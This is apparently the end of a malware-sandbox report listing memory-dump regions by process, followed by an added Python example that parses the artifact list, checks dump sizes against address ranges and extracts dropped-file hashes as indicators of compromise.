                            Filesize: 208KB

                          • memory/2620-69-0x0000000022060000-0x0000000022094000-memory.dmp
                            Filesize: 208KB

                          • memory/2620-65-0x0000000000600000-0x0000000001854000-memory.dmp
                            Filesize: 18.3MB

                          • memory/2620-63-0x0000000000600000-0x0000000001854000-memory.dmp
                            Filesize: 18.3MB

                          • memory/2620-183-0x0000000022A90000-0x0000000022AA9000-memory.dmp
                            Filesize: 100KB

                          • memory/3724-88-0x0000000000400000-0x0000000000462000-memory.dmp
                            Filesize: 392KB

                          • memory/3724-86-0x0000000000400000-0x0000000000462000-memory.dmp
                            Filesize: 392KB

                          • memory/3724-81-0x0000000000400000-0x0000000000462000-memory.dmp
                            Filesize: 392KB

                          • memory/4268-83-0x0000000000400000-0x0000000000478000-memory.dmp
                            Filesize: 480KB

                          • memory/4268-80-0x0000000000400000-0x0000000000478000-memory.dmp
                            Filesize: 480KB

                          • memory/4268-87-0x0000000000400000-0x0000000000478000-memory.dmp
                            Filesize: 480KB

                          • memory/4268-85-0x0000000000400000-0x0000000000478000-memory.dmp
                            Filesize: 480KB

                          • memory/5040-29-0x0000000005EE0000-0x0000000005F46000-memory.dmp
                            Filesize: 408KB

                          • memory/5040-45-0x0000000007980000-0x0000000007A16000-memory.dmp
                            Filesize: 600KB

                          • memory/5040-39-0x0000000006010000-0x0000000006364000-memory.dmp
                            Filesize: 3.3MB

                          • memory/5040-41-0x0000000006640000-0x000000000665E000-memory.dmp
                            Filesize: 120KB

                          • memory/5040-42-0x0000000006670000-0x00000000066BC000-memory.dmp
                            Filesize: 304KB

                          • memory/5040-43-0x0000000007F60000-0x00000000085DA000-memory.dmp
                            Filesize: 6.5MB

                          • memory/5040-44-0x0000000006BB0000-0x0000000006BCA000-memory.dmp
                            Filesize: 104KB

                          • memory/5040-25-0x0000000005080000-0x00000000050B6000-memory.dmp
                            Filesize: 216KB

                          • memory/5040-28-0x0000000005E70000-0x0000000005ED6000-memory.dmp
                            Filesize: 408KB

                          • memory/5040-27-0x0000000005760000-0x0000000005782000-memory.dmp
                            Filesize: 136KB

                          • memory/5040-46-0x0000000006CD0000-0x0000000006CF2000-memory.dmp
                            Filesize: 136KB

                          • memory/5040-26-0x00000000057D0000-0x0000000005DF8000-memory.dmp
                            Filesize: 6.2MB

                          • memory/5040-49-0x0000000009140000-0x000000000DA83000-memory.dmp
                            Filesize: 73.3MB

                          • memory/5040-47-0x0000000008B90000-0x0000000009134000-memory.dmp
                            Filesize: 5.6MB
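The artifact list above is most useful as machine-readable input: the dropped-file hashes are the IOCs to hunt for, and each memory dump's address range tells you where in the process the dumped region lived. The following is an added example (not part of the sandbox report or its tooling) that parses entries in this layout, verifies each memory dump's reported Filesize against its address range, groups the dumps that start at 0x400000 (the default 32-bit PE image base, the usual shape of an unpacked or injected payload and the first regions worth carving and hashing), and collects dropped-file SHA-256 hashes while skipping `__PSScriptPolicyTest_*.ps1`, which PowerShell itself writes to %TEMP% on start-up to probe script-enforcement policy and which is therefore not an attacker IOC. The excerpt embedded in the block is copied from this report; the function and pattern names are this example's own, and the size tolerance (one unit of the last printed digit) is an assumption about how the report rounds.

```python
"""Turn a sandbox report's artifact list (dropped files and memory dumps) into
checkable IOCs and sanity-check the memory-dump entries.

Added example, not part of the sandbox report or its tooling. REPORT_EXCERPT is
copied from the report (one 'Label: value' per line); the parser also accepts the
extracted layout with label and value on separate lines. Names are this example's own.
"""
import re

REPORT_EXCERPT = r"""
• C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3bt551rt.fmo.ps1
  Filesize: 60B
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
• C:\Users\Admin\AppData\Roaming\Houting.Gha
  Filesize: 431KB
  SHA256: 0746bb62f964f73c203a6c4ec7cc8418edc39f158a62be266f480629796b22dd
• memory/976-92-0x0000000000400000-0x0000000000424000-memory.dmp
  Filesize: 144KB
• memory/976-94-0x0000000000400000-0x0000000000424000-memory.dmp
  Filesize: 144KB
• memory/5040-49-0x0000000009140000-0x000000000DA83000-memory.dmp
  Filesize: 73.3MB
"""

MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9a-fA-F]+)-0x([0-9a-fA-F]+)-memory\.dmp$")
SIZE_RE = re.compile(r"^(\d+(?:\.\d+)?)(B|KB|MB|GB)$")
FIELD_RE = re.compile(r"^(\w+):\s*(.+)$")
UNIT = {"B": 1, "KB": 1024, "MB": 1024 ** 2, "GB": 1024 ** 3}  # binary units: 144KB == 0x24000 bytes
# PowerShell writes __PSScriptPolicyTest_<random>.ps1 to %TEMP% at start-up to probe
# script-enforcement (AppLocker/WDAC) policy; it proves PowerShell ran, nothing more.
BENIGN_RE = re.compile(r"\\__PSScriptPolicyTest_[^\\]+\.ps1$")


def parse_artifacts(text):
    """One dict per bullet: {'name': ..., 'Filesize': ..., 'SHA256': ...}."""
    entries, pending = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("•"):
            entries.append({"name": line[1:].strip()})
            pending = None
        elif not entries:
            continue                           # text before the first bullet
        elif pending is not None:              # value for the label on the previous line
            entries[-1][pending], pending = line, None
        elif FIELD_RE.match(line):             # compact 'Label: value' line
            key, value = FIELD_RE.match(line).groups()
            entries[-1][key] = value
        else:                                  # extracted layout: label now, value on next line
            pending = line
    return entries


def size_matches(reported, actual_bytes):
    """True if actual_bytes agrees with '144KB' / '73.3MB' within one unit of the last digit."""
    m = SIZE_RE.match(reported)
    if not m:
        return False
    number, unit = m.groups()
    decimals = len(number.split(".")[1]) if "." in number else 0
    return abs(actual_bytes - float(number) * UNIT[unit]) <= UNIT[unit] / 10 ** decimals


def memory_region(name):
    """(pid, dump_index, start, end) for 'memory/<pid>-<n>-0x<start>-0x<end>-memory.dmp'."""
    m = MEM_RE.match(name)
    if not m:
        return None
    pid, idx, start, end = m.groups()
    return int(pid), int(idx), int(start, 16), int(end, 16)


def check_memory_sizes(entries):
    """[(name, end - start, reported Filesize agrees?)] for every memory dump."""
    out = []
    for e in entries:
        region = memory_region(e["name"])
        if region:
            size = region[3] - region[2]
            out.append((e["name"], size, size_matches(e.get("Filesize", ""), size)))
    return out


def image_base_dumps(entries, base=0x400000):
    """{pid: [distinct dump sizes]} for dumps starting at the default 32-bit PE image base;
    a full-image-sized region there is the usual shape of an unpacked or injected payload."""
    by_pid = {}
    for e in entries:
        region = memory_region(e["name"])
        if region and region[2] == base:
            by_pid.setdefault(region[0], set()).add(region[3] - region[2])
    return {pid: sorted(sizes) for pid, sizes in by_pid.items()}


def dropped_file_iocs(entries):
    """{sha256: path} for dropped files, minus the benign PowerShell policy-test file."""
    return {e["SHA256"]: e["name"] for e in entries
            if "SHA256" in e and not BENIGN_RE.search(e["name"])}


if __name__ == "__main__":
    arts = parse_artifacts(REPORT_EXCERPT)
    for name, size, ok in check_memory_sizes(arts):
        print("ok " if ok else "BAD", f"{size:>10} bytes", name)
    print("image-base dumps by PID:", image_base_dumps(arts))
    print("dropped-file IOCs:", dropped_file_iocs(arts))
```

Paste the whole artifact list into `REPORT_EXCERPT` to get the full IOC set; a `BAD` line from `check_memory_sizes` means a dump name and its Filesize disagree, which usually indicates a copy error rather than anything about the sample. The dedup in `image_base_dumps` matters because the report lists the same region several times (once per dump taken), so identical regions collapse to one size per PID.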